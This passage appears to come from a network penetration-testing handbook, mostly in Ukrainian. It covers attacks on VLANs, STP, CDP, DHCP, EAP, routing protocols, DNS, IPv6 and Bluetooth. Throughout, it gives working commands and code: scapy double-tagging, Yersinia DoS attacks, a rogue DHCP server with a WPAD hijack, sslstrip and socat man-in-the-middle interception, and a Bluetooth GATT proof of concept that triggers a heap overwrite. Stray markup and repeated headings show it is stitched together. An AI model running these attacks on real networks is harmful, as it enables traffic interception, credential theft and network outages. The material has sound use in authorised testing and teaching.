root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Описувана атака Dynamic Trunking and creating virtual interfaces an discovering hosts inside в інших VLANах автоматично виконується інструментом: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

Якщо атакуючий знає значення MAC, IP and VLAN ID of the victim host, він може спробувати double tag a frame зі своєю призначеною VLAN та VLAN цілі й відправити пакет. Оскільки victim won’t be able to connect back з атакуючим, найкращим варіантом для атакуючого є communicate via UDP з протоколами, які можуть виконувати корисні дії (як-от SNMP).

Ще одна опція для атакуючого — запустити TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (ймовірно через інтернет). Потім атакуючий може sniff на другому хості, яким він володіє, щоб перевірити, чи отримає він пакети від жертви.

Щоб виконати цю атаку, можна використати scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

If you have доступ до switch, до якого ви підключені безпосередньо, ви маєте змогу bypass VLAN segmentation всередині мережі. Просто переведіть порт у trunk mode (також відомий як trunk), створіть virtual interfaces з IDs цільових VLAN і налаштуйте IP address. Ви можете спробувати отримати адресу динамічно (DHCP) або налаштувати її статично. Залежить від випадку.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

У певних середовищах, таких як guest wireless networks, впроваджуються налаштування port isolation (also known as private VLAN), щоб запобігти прямому спілкуванню клієнтів, підключених до wireless access point. Проте існує техніка, яка може обійти ці заходи ізоляції. Ця техніка експлуатує або відсутність network ACLs, або їх неправильну конфігурацію, дозволяючи IP packets маршрутизуватися через router, щоб досягти іншого клієнта в тій же мережі.

Атака виконується шляхом створення packet, що несе IP address цільового клієнта, але з MAC address router’а. Це змушує router помилково переслати пакет до цільового клієнта. Цей підхід схожий на той, що використовується в Double Tagging Attacks, де можливість контролювати хост, доступний жертві, використовується для експлуатації вразливості.

Ключові кроки атаки:

1. Формування пакета: Пакет спеціально створюється так, щоб містити IP address цільового клієнта, але з MAC address router’а.
2. Експлуатація поведінки router’а: Сформований пакет відправляється в напрямку router’а, який через конфігурацію перенаправляє пакет до цільового клієнта, обходячи ізоляцію, що забезпечується private VLAN налаштуваннями.

VTP Attacks

VTP (VLAN Trunking Protocol) централізує управління VLAN. Він використовує revision numbers для підтримки цілісності VLAN database; будь-яка модифікація збільшує це число. Switches приймають конфігурації з вищими revision numbers, оновлюючи власні VLAN databases.

VTP Domain Roles

• VTP Server: Керує VLAN — створює, видаляє, модифікує. Він розсилає VTP announcements членам домену.
• VTP Client: Отримує VTP announcements для синхронізації свого VLAN database. Ця роль обмежує можливість локально змінювати конфігурацію VLAN.
• VTP Transparent: Не бере участі в VTP updates, але пересилає VTP announcements. Не піддається VTP attacks, підтримує постійний revision number рівний нулю.

VTP Advertisement Types

• Summary Advertisement: Розсилається VTP server кожні 300 секунд, несе основну інформацію про домен.
• Subset Advertisement: Відправляється після змін у VLAN configuration.
• Advertisement Request: Видається VTP client для запиту Summary Advertisement, зазвичай у відповідь на виявлення вищого configuration revision number.

VTP vulnerabilities можуть бути експлуатовані виключно через trunk ports, оскільки VTP announcements поширюються лише ними. Після DTP attack сценарії можуть переключатися на VTP. Інструменти на кшталт Yersinia можуть полегшити VTP attacks, метою яких є очищення VLAN database, що ефективно порушує роботу мережі.

Note: This discussion pertains to VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

У графічному режимі Yersinia виберіть опцію deleting all VTP vlans, щоб очистити базу даних VLAN.

STP Атаки

Якщо ви не можете захопити кадри BPDU на ваших інтерфейсах, навряд чи вам вдасться успішно здійснити атаку STP.

STP BPDU DoS

Надсилаючи велику кількість BPDUs TCP (Topology Change Notification) або Conf (BPDUs, що надсилаються при створенні топології), комутатори перевантажуються і перестають працювати коректно.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Коли надсилається TCP, CAM table of the switches буде видалена через 15s. Потім, якщо ви постійно надсилаєте такі packets, CAM table буде перезапускатися постійно (або кожні 15segs), і коли воно перезапускається, switch поводиться як hub.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Зловмисник імітує поведінку switch, щоб стати STP root у мережі. Потім через нього проходитиме більше трафіку. Це цікаво, коли ви підключені до двох різних switches.
Цього досягають шляхом відправлення пакетів BPDUs CONF, які повідомляють, що значення priority менше, ніж фактичне priority поточного root switch.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Якщо attacker підключений до 2 switches, він може стати root нового tree, і весь трафік між цими switches проходитиме через нього (буде виконано MITM attack).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Атаки

CISCO Discovery Protocol (CDP) є важливим для зв’язку між пристроями CISCO, дозволяючи їм взаємно ідентифікуватися та обмінюватися деталями конфігурації.

Passive Data Collection

CDP налаштований на трансляцію інформації через усі порти, що може створювати ризик безпеки. Зловмисник, підключившись до порту комутатора, може розгорнути network sniffers на кшталт Wireshark, tcpdump, або Yersinia. Ця дія може розкрити конфіденційну інформацію про мережевий пристрій, включно з його моделлю та версією Cisco IOS, на якій він працює. Зловмисник може потім націлити конкретні вразливості в ідентифікованій версії Cisco IOS.

Inducing CDP Table Flooding

Більш агресивний підхід полягає у запуску Denial of Service (DoS) атаки шляхом переповнення пам’яті комутатора, видаючи себе за легітимні пристрої CISCO. Нижче наведено послідовність команд для ініціювання такої атаки з використанням Yersinia, мережевого інструменту, призначеного для тестування:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Під час цієї атаки CPU комутатора та таблиця сусідів CDP зазнають значного навантаження, що часто призводить до “паралічу мережі” через надмірне споживання ресурсів.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

You could also use scapy. Be sure to install it with scapy/contrib package.

Атаки VoIP та інструмент VoIP Hopper

VoIP-телефони, що дедалі частіше інтегруються з IoT-пристроями, пропонують функції, як-от відкривання дверей або керування термостатами через спеціальні телефонні номери. Однак така інтеграція може створювати ризики безпеки.

Інструмент voiphopper призначений для емуляції VoIP-телефона в різних середовищах (Cisco, Avaya, Nortel, Alcatel-Lucent). Він визначає VLAN ID голосової мережі, використовуючи протоколи, такі як CDP, DHCP, LLDP-MED та 802.1Q ARP.

VoIP Hopper пропонує три режими для Cisco Discovery Protocol (CDP):

1. Sniff Mode (-c 0): Аналізує мережеві пакети, щоб визначити VLAN ID.
2. Spoof Mode (-c 1): Генерує користувацькі пакети, що імітують пакети реального VoIP-пристрою.
3. Spoof with Pre-made Packet Mode (-c 2): Надсилає пакети, ідентичні тим, що генерує конкретна модель Cisco IP phone.

Переважним режимом з точки зору швидкості є третій. Він вимагає вказати:

• Мережевий інтерфейс атакуючого (-i параметр).
• Назву VoIP-пристрою, що емуляється (-E параметр), у форматі іменування Cisco (наприклад, SEP, за яким слідує MAC-адреса).

У корпоративному середовищі, щоб імітувати існуючий VoIP-пристрій, можна:

• Перевірити MAC-наклейку на телефоні.
• Перейти до налаштувань дисплея телефону, щоб переглянути інформацію про модель.
• Підключити VoIP-пристрій до ноутбука та спостерігати CDP-запити за допомогою Wireshark.

Приклад команди для запуску інструмента в третьому режимі виглядає так:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Attacks

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Два типи DoS можуть бути виконані проти DHCP серверів. Перший полягає у симуляції достатньої кількості фейкових хостів, щоб зайняти всі можливі IP-адреси.
Ця атака працюватиме тільки якщо ви можете бачити відповіді DHCP сервера та завершити протокол (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)). Наприклад, це неможливо в Wifi мережах.

Інший спосіб виконати DHCP DoS — відправити DHCP-RELEASE packet, використовуючи як вихідну адресу кожну можливу IP-адресу. Тоді сервер подумає, що всі припинили використовувати ці IP-адреси.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

A more automatic way of doing this is using the tool DHCPing

You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, ви можете надати шкідливі значення, згадані в наступній атаці.

Встановлення шкідливих значень

A rogue DHCP server can be set up using the DHCP script located at /usr/share/responder/DHCP.py. Це корисно для мережевих атак, наприклад перехоплення HTTP-трафіку та облікових даних, шляхом перенаправлення трафіку на шкідливий сервер. Проте встановлення шкідливого шлюзу менш ефективне, оскільки воно дозволяє лише перехоплювати вихідний трафік від клієнта та пропускає відповіді від реального шлюзу. Натомість рекомендується налаштувати шкідливий DNS або WPAD-сервер для ефективнішої атаки.

Нижче наведено опції команд для налаштування шкідливого DHCP-сервера:

• Наша IP-адреса (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine’s IP as the gateway.
• Локальний DNS-домен: Опційно використайте -d example.org, щоб задати локальний DNS-домен.
• IP оригінального маршрутизатора/шлюзу: Використайте -r 10.0.0.1, щоб вказати IP легітимного маршрутизатора або шлюзу.
• IP основного DNS-сервера: Використайте -p 10.0.0.100, щоб встановити IP шкідливого DNS-сервера, яким ви керуєте.
• IP вторинного DNS-сервера: Опційно використайте -s 10.0.0.1, щоб задати IP вторинного DNS-сервера.
• Маска підмережі локальної мережі: Use -n 255.255.255.0 to define the netmask for the local network.
• Інтерфейс для DHCP-трафіку: Use -I eth1 to listen for DHCP traffic on a specific network interface.
• Адреса конфігурації WPAD: Use -w “http://10.0.0.100/wpad.dat” to set the address for WPAD configuration, assisting in web traffic interception.
• Підробити IP шлюзу за замовчуванням: Include -S to spoof the default gateway IP address.
• Відповідати на всі DHCP-запити: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

Правильне використання цих опцій дозволяє створити шкідливий DHCP-сервер для ефективного перехоплення мережевого трафіку.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP атаки

Ось деякі тактики атак, які можуть бути використані проти реалізацій 802.1X:

• Активне brute-force підбирання пароля через EAP
• Атака на RADIUS сервер за допомогою некоректного EAP вмісту **(exploits)
• Перехоплення EAP-повідомлень та офлайн-злам паролів (EAP-MD5 і PEAP)
• Примусове використання EAP-MD5 для обходу перевірки TLS сертифікатів
• Інжекція шкідливого мережевого трафіку після аутентифікації з використанням hub або подібного

Якщо зловмисник знаходиться між жертвою та сервером аутентифікації, він може спробувати знизити (за потреби) протокол аутентифікації до EAP-MD5 та перехопити спробу аутентифікації. Потім він може brute-force це, використовуючи:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) — це клас мережевих протоколів, призначених для створення гарячої резервної системи маршрутизації. Завдяки FHRP фізичні маршрутизатори можуть бути об’єднані в один логічний пристрій, що підвищує відмовостійкість і допомагає розподіляти навантаження.

Інженери Cisco Systems розробили два протоколи FHRP — GLBP та HSRP.

GLBP & HSRP Attacks

RIP

Існує три відомі версії Routing Information Protocol: RIP, RIPv2 та RIPng. Datagram-и відправляються до peers через порт 520 з використанням UDP у RIP та RIPv2, тоді як у RIPng datagram-и транслюються на UDP порт 521 через IPv6 multicast. Підтримка MD5 authentication була введена в RIPv2. Натомість у RIPng немає вбудованої автентифікації — він покладається на опціональні заголовки IPsec AH та ESP в IPv6.

• RIP and RIPv2: Зв’язок здійснюється через UDP datagram-и на порті 520.
• RIPng: Використовує UDP порт 521 для трансляції datagram-ів через IPv6 multicast.

Зверніть увагу, що RIPv2 підтримує MD5 authentication, тоді як RIPng не має вбудованої автентифікації і покладається на IPsec AH та ESP у IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) — динамічний протокол маршрутизації. Це протокол з вектором відстані. Якщо відсутня автентифікація та налаштування passive interfaces, зловмисник може втрутитися в маршрутизацію EIGRP і спричинити отруєння таблиць маршрутизації. Крім того, мережа EIGRP (іншими словами, autonomous system) є плоскою і не має сегментації на зони. Якщо атакуючий вводить маршрут, ймовірно, що цей маршрут розповсюдиться по всій автономній системі EIGRP.

Для атаки на систему EIGRP потрібно встановити neighbourhood з легітимним EIGRP маршрутизатором, що відкриває багато можливостей — від базової розвідки до різних ін’єкцій.

FRRouting дозволяє реалізувати віртуальний маршрутизатор, що підтримує BGP, OSPF, EIGRP, RIP та інші протоколи. Все, що потрібно — розгорнути його на системі зловмисника, і ви зможете видавати себе за легітимний маршрутизатор у домені маршрутизації.

EIGRP Attacks

Coly має можливості перехоплення EIGRP broadcast-ів. Він також дозволяє інжектувати пакети, що може бути використано для зміни конфігурацій маршрутизації.

OSPF

У Open Shortest Path First (OSPF) протоколі зазвичай використовується MD5 authentication для забезпечення безпечного зв’язку між маршрутизаторами. Проте цей механізм безпеки можна скомпрометувати за допомогою інструментів, таких як Loki та John the Ripper. Ці інструменти здатні перехоплювати та ламати MD5 hashes, виявляючи ключ автентифікації. Після отримання цього ключа його можна використати для введення нової інформації про маршрути. Для налаштування параметрів маршруту та встановлення скомпрометованого ключа відповідно використовуються вкладки Injection та Connection.

• Capturing and Cracking MD5 Hashes: Для цього використовуються інструменти на кшталт Loki та John the Ripper.
• Configuring Route Parameters: Це робиться через вкладку Injection.
• Setting the Compromised Key: Ключ налаштовується у вкладці Connection.

Other Generic Tools & Sources

• Above: Інструмент для сканування мережевого трафіку та виявлення вразливостей
• Ви можете знайти більше інформації про network attacks here.

Spoofing

Зловмисник конфігурує всі мережеві параметри (GW, IP, DNS) для нового учасника мережі, відправляючи підроблені DHCP-відповіді.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Перегляньте previous section.

ICMPRedirect

ICMP Redirect полягає у надсиланні ICMP пакета типу 1, коду 5, що вказує, що атакуючий є найкращим шляхом для досягнення IP. Потім, коли жертва хоче зв’язатися з цією IP, вона відправить пакет через атакуючого.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

The attacker буде resolve деякі (або всі) domains, які victim запитує.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Налаштувати власний DNS за допомогою dnsmasq

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Локальні шлюзи

Часто існує кілька маршрутів до систем та мереж. Після складання списку MAC-адрес у локальній мережі, використайте gateway-finder.py щоб визначити хости, які підтримують IPv4 forwarding.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Для локального розв'язання імен, коли DNS-запити неуспішні, системи Microsoft покладаються на **Link-Local Multicast Name Resolution (LLMNR)** і **NetBIOS Name Service (NBT-NS)**. Аналогічно, **Apple Bonjour** і **Linux zero-configuration** реалізації використовують **Multicast DNS (mDNS)** для виявлення систем у мережі. Через відсутність автентифікації в цих протоколах та їх роботу поверх UDP із широкомовними повідомленнями, їх можуть використовувати атакувальники, які прагнуть перенаправити користувачів на зловмисні сервіси.

Ви можете видавати себе за сервіси, які шукають хости, використовуючи Responder для відправлення фальшивих відповідей.\
Детальніше читайте про [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Браузери зазвичай використовують протокол **Web Proxy Auto-Discovery (WPAD) для автоматичного отримання налаштувань proxy**. Це включає отримання конфігураційних даних із сервера, зокрема через URL на кшталт "http://wpad.example.org/wpad.dat". Виявлення цього сервера клієнтами може відбуватися різними механізмами:

- Через **DHCP**, де виявлення спрощується за допомогою спеціального запису з кодом 252.
- Через **DNS**, що передбачає пошук імені хоста з позначенням _wpad_ у локальному домені.
- Через **Microsoft LLMNR and NBT-NS**, які є fallback-методами у випадках, коли DNS-запити не вдаються.

Інструмент Responder використовує цей протокол, виступаючи як **зловмисний WPAD server**. Він застосовує DHCP, DNS, LLMNR і NBT-NS, щоб ввести клієнтів в оману й змусити їх підключитися до нього. Щоб докладніше дізнатися, як сервіси можуть бути підроблені за допомогою Responder, [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

Ви можете запропонувати різні сервіси в мережі, щоб спробувати обдурити користувача і змусити його ввести деякі **plain-text credentials**. **Більше інформації про цю атаку в** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**

### IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. Ви можете змусити жертву думати, що IPv6 адреса GW має MAC атакуючого.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### Active Discovery Notes

Майте на увазі, що коли UDP пакет відправляється на пристрій, який не має запитаного порту, надсилається ICMP (Port Unreachable).

### **ARP discover**

ARP пакети використовуються для виявлення, які IP-адреси використовуються в мережі. ПК повинен відправити запит для кожної можливої IP-адреси, і лише ті, що використовуються, відповідають.

### **mDNS (multicast DNS)**

Bettercap відправляє MDNS-запит (кожні X мс), запитуючи **\_services\_.dns-sd.\_udp.local**; машина, що бачить цей пакет, зазвичай відповідає на цей запит. Потім він шукає лише машини, що відповідають на "services".

**Tools**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Bettercap відправляє broadcast-пакети на порт 137/UDP з запитом імені "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

### **SSDP (Simple Service Discovery Protocol)**

Bettercap відправляє SSDP broadcast-пакети в пошуку всіх типів сервісів (UDP Port 1900).

### **WSD (Web Service Discovery)**

Bettercap відправляє WSD broadcast-пакети в пошуку сервісів (UDP Port 3702).


## Bluetooth (L2CAP/ATT/GATT) Attacks

- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite